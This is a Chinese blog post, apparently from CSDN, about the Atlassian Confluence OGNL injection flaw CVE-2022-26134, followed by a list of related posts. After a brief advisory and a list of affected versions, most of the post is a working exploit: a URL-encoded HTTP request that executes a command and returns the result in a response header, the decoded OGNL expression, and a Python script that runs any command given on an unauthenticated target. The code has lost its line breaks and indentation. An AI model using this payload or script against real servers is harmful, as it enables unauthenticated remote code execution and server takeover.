Atlassian Confluence 远程代码执行/CVE-2022-26134

最新推荐文章于 2024-09-06 08:05:24 发布
最新推荐文章于 2024-09-06 08:05:24 发布
阅读量1k 收藏 1
点赞数 4
分类专栏: 漏洞库 文章标签: 安全 运维开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43080961/article/details/125127799
版权

近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。

      Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。

 

目前受影响的 Atlassian Confluence Server and Data Center 版本:

Atlassian Confluence Server and Data Center < 7.4.17

7.5.0  ≤ Atlassian Confluence Server and Data Center < 7.13.7

7.14.0 ≤ Atlassian Confluence Server and Data Center < 7.14.3

7.15.0 ≤ Atlassian Confluence Server and Data Center < 7.15.2

7.16.0 ≤ Atlassian Confluence Server and Data Center < 7.16.4

7.17.0 ≤ Atlassian Confluence Server and Data Center < 7.17.4

7.18.0 ≤ Atlassian Confluence Server and Data Center < 7.18.1

 

漏洞利用发送如下请求即可执行任意命令,并在HTTP返回头中获取执行结果:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: your-ip:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: close

OGNL表达式为:

 

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

 

 

import requestsimport reimport sysfrom bs4 import BeautifulSoupimport urllib3urllib3.disable_warnings()
def check(host):
 r = requests.get(host+"/login.action", verify=False) if(r.status_code == 200):  filter_version = re.findall("<span id='footer-build-information'>.*</span>",r.text)  if(len(filter_version)>=1):   version = filter_version[0].split("'>")[1].split('</')[0]   return version  else:   return False else:  return hostdef exploit(host, command):    headers = {        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': '*/*',    }    r = requests.get(host + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)    if(r.status_code == 302):        return r.headers['X-Cmd-Response']    else:        return False
if(len(sys.argv) < 3): print("USE: python3 " + sys.argv[0] + " https://target.com cmd") print("ex: python3 " + sys.argv[0] + " https://target.com id")
else: target = sys.argv[1] cmd = sys.argv[2] version = check(target) print("============ GET Confluence Version ============") if(version):  print("Version: " + version) else:  print("Version: Not Found") print(exploit(target, cmd))
三鲜水饺子
关注
专栏目录
Atlassian Confluence CVE-2022-26134 RCE漏洞
sxr__nc的博客
04-22 1127
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134漏洞分析与防护
不忘初心,护天下安全!
06-24 985
Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。该软件由Atlassian公司负责开发和维护。2022年6月3日,国家信息安全漏洞共享平台(CNVD)收录了Confluence远程代码执行漏洞(CNVD-2022-43094,对应CVE-2022-26134)。在Atlassian Confluence Server and Data Center上存在OGNL注入漏洞,恶意攻
Atlassian Confluence_远程代码执行(CVE-2022-26134)
Blue的博客
06-06 1608
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence ServerData Center 存在OGNL 注入漏洞,该漏洞源于Confluence,xwork-1.0.3-atlassian-8.jar 对 OGNL 表达式过滤不严谨,导致存在 OGNL 表达式注入漏洞,攻击者可以通过构造发送特定HTTP请求利用此漏洞。成功利用后可对 Confluence
Python知识点:在Python应用中,如何使用Confluence进行文档管理
最新发布
码农超哥的博客
09-06 622
通过以上步骤,你可以在Python应用中有效地使用Confluence进行文档管理。如果你有具体的需求或遇到问题,随时告诉我!这些信息用于身份验证和API请求。是一个流行的库,它可以帮助你与Confluence进行API交互。确保你的API凭证和敏感信息不被暴露在代码中,考虑使用环境变量或配置文件来管理这些信息。在实际应用中,你可能需要处理API请求中的错误,并记录日志信息以便调试。首先,你需要安装用于与Confluence进行交互的Python库。你需要获取Confluence的API凭证,包括。
企业知识管理与协同软件系统Atlassian Confluence 远程代码执行漏洞
weixin_68647219的博客
08-01 3516
Atlassian Confluence 远程代码执行漏洞高危漏洞,该漏洞是由于上传功能的异常处理函数没有正确处理用户输入的错误信息,导致远程攻击者可通过修改HTTP请求头中的Content-Type值所造成的可能导致远程攻击者构造发送恶意的数据包,利用该漏洞进而在受影响服务器上执行任意系统命令。
Atlassian - Confluence 知识管理与企业社交
Rock-Jeep的专栏
09-12 3054
[+] Confluence - 知识管理与企业社交 典型客户 Confluence - 知识管理与企业社交 Confluence 结合强大的在线编辑功能,与Office高度集成以及大量的插件扩展,帮助人们更好的协作与共享信息。 打破组织架构的壁垒,无论你隶属于哪个部门、身处哪个职位,企业所有员工都在同一页面上分享知识。
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 3102
信息安全部监测到Atlassian Confluence Server and Data CenterCVE-2022-26134远程代码执行漏洞。
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 1012
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence ServerData Center执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
【漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 2258
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence RCE漏洞复现(CVE-2023-22527)
0xSec
01-23 2166
Atlassian Confluence/template/aui/text-inline.vm接口处存在velocity模板注入,未经身份验证的攻击者可利用此漏洞构造恶意请求远程代码执行,可导致服务器失陷
atlassian-confluence-7.9.3.rar
12-12
atlassian-confluence-7.9.3安装及相关工具,包含原始文件、补丁和mysqljar。一键式使用和安装包
confluence源码
02-20
confluence最新6.12版本的源代码,主要confluence的核心源代码
atlassian-confluence破解文件及教程,亲测可用
01-16
atlassian-confluence破解文件已说明,6.3亲测可用。目前atlassian jira crowd confluence fisheye crucible 均安装破解成功 bamboo bitbucket还在研究
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5210
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
Atlassian Confluence安装
weixin_30949361的博客
08-03 840
前言 Confluence与Jira 由于线上jira和confluence之前互相关联,confluence的登录用户全部关联自jira的用户,confluence安装时会提示是否关联jira,由于这个问题,我们必须先安装jira,后安装confluence. 一、环境准备 1.1、安装文件下载 链接: 1.2、Java环境准备 参考资料:https://jingy...
ATLASSIAN CONFLUENCE 远程代码执行漏洞(CVE-2022-26134)漏洞复现
Websec
06-07 1217
近日,Atlassian官方发布了Confluence ServerData Center OGNL 注入漏洞(CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence ServerData Center执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一
Confluence OGNL 注入漏洞(CVE-2022-26134)复现
crowsec
06-09 1250
Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。漏洞仅限本地复现使用,请遵守网络安全法律法规,违者使用与本程序开发者无关...
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)复现
weixin_42489549的博客
06-29 9133
CVE-2022-26134 Confluence远程命令执行漏洞复现
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)漏洞复现
网安君的博客
06-07 3121
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134的漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian ConfluenceData Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
Docker中部署Confluence与Jira-Software详细步骤
"在Docker中部署Confluence和jira-software的方法步骤" 在Docker环境下部署Confluence和jira-software是一项常见的任务,尤其对于需要管理团队协作和项目跟踪的组织来说。以下是一个详细的过程,指导如何在Docker上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值